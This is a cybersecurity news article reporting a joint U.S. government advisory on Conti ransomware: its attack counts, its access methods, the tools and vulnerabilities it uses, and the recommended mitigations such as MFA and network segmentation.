Conti hackers continue to target US, international organizations, as attacks and IOCs increase

U.S. security agencies have updated a previously issued joint cybersecurity advisory on malicious operations carried out by Conti hackers against domestic and international organizations. The amendment includes newly identified indicators of compromise (IOCs) made up of nearly 100 domain names and adds the United States Secret Service (USSS) as a co-author.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) said on Wednesday that these domain names share ‘registration and naming characteristics similar’ to those used in Conti ransomware attacks from groups distributing the malware. It also added that while many of these domains have been used in malicious operations, some of them ‘may be abandoned or may share similar characteristics coincidentally.’

“While there are no specific or credible cyber threats to the U.S. homeland at this time, CISA, FBI, NSA, and the United States Secret Service (USSS) encourage organizations to review this advisory and apply the recommended mitigations,” the joint advisory said. 

Last month, the CISA and FBI reported that the Conti ransomware group remains active and reported ransomware attacks against the U.S. and international organizations have risen to more than 1,000. Notable attack vectors include Trickbot and Cobalt Strike.

The agencies reported in September increased Conti ransomware attacks with over 400 attacks on U.S. and international organizations attempting to steal files, encrypt servers and workstations, and demand ransom payments to return stolen sensitive data. This was preceded by the FBI identifying last May at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, including law enforcement agencies, emergency medical services, 9-1-1 dispatch centers, and municipalities within the last year. 

While Conti is considered a ransomware-as-a-service (RaaS) model ransomware variant, there is variation in its structure that differentiates it from a typical affiliate model, the alert said. “It is likely that Conti developers pay the deployers of the ransomware a wage rather than a percentage of the proceeds used by affiliate cyber actors and receives a share of the proceeds from a successful attack,” it added. 

MITRE said that Conti was first observed in December 2019, and has been distributed via TrickBot. It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, hackers using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid.

Conti hackers often gain initial access to networks through spearphishing campaigns using tailored emails that contain malicious attachments or malicious links. Quite often, malicious Word attachments contain embedded scripts that can be used to download or drop other malware, such as TrickBot and IcedID, and/or Cobalt Strike to assist with lateral movement and later stages of the attack life cycle with the eventual goal of deploying Conti ransomware, the alert added. 

The group also breaches networks using stolen or weak Remote Desktop Protocol (RDP) credentials, phone calls, fake software promoted through search engine optimization, other malware distribution networks such as ZLoader, and common vulnerabilities in external assets.

In the execution phase, the hackers run a ‘getuid’ payload before using a more aggressive payload to reduce the risk of triggering antivirus engines, the advisory said. CISA and FBI have observed Conti hackers using Router Scan penetration testing tool to maliciously scan for and brute force routers, cameras, and network-attached storage devices with web interfaces. Additionally, hackers use Kerberos attacks to attempt to get the ‘Admin’ hash to conduct brute force attacks, it added.

The alert said that Conti hackers are known to exploit legitimate remote monitoring and management software and remote desktop software as backdoors to maintain persistence on victim networks. “The actors use tools already available on the victim network—and, as needed, add additional tools, such as Windows Sysinternals and Mimikatz—to obtain users’ hashes and clear-text credentials, which enable the actors to escalate privileges within a domain and perform other post-exploitation and lateral movement tasks. In some cases, the actors also use TrickBot malware to carry out post-exploitation tasks,” it added.

According to a recently leaked threat actor ‘playbook,’ Conti hackers also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim’s network, the alert said. These include 2017 Microsoft Windows Server Message Block 1.0 server vulnerabilities, ‘PrintNightmare’ vulnerability in Windows Print spooler service, and ‘Zerologon’ vulnerability in Microsoft Active Directory Domain Controller systems, it added.

The advisory also said that artifacts leaked with the playbook identify four Cobalt Strike server Internet Protocol (IP) addresses Conti hackers previously used to communicate with their command and control (C2) server. CISA and FBI have observed Conti hackers using different Cobalt Strike server IP addresses unique to different victims, it added.

Conti hackers often use the open-source Rclone command line program for data exfiltration. After the hackers steal and encrypt the victim’s sensitive data, they employ a double extortion technique in which they demand the victim pay a ransom for the release of the encrypted data and threaten the victim with public release of the data if the ransom is not paid, the advisory added.

Earlier this month, a Ukrainian security researcher leaked several years of internal chat logs and other sensitive data tied to Conti that focuses on deploying its ransomware to companies with more than US$100 million in annual revenue. 

“The chat logs offer a fascinating glimpse into the challenges of running a sprawling criminal enterprise with more than 100 salaried employees,” Brian Krebs, cybersecurity expert, wrote in a recent blog post. “The records also provide insight into how Conti has dealt with its own internal breaches and attacks from private security firms and foreign governments.” 

To secure systems against Conti ransomware, CISA, FBI, and the National Security Agency (NSA) recommend implementing the mitigation measures, including adopting multi-factor authentication (MFA), implementing network segmentation, and keeping operating systems and software up to date.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.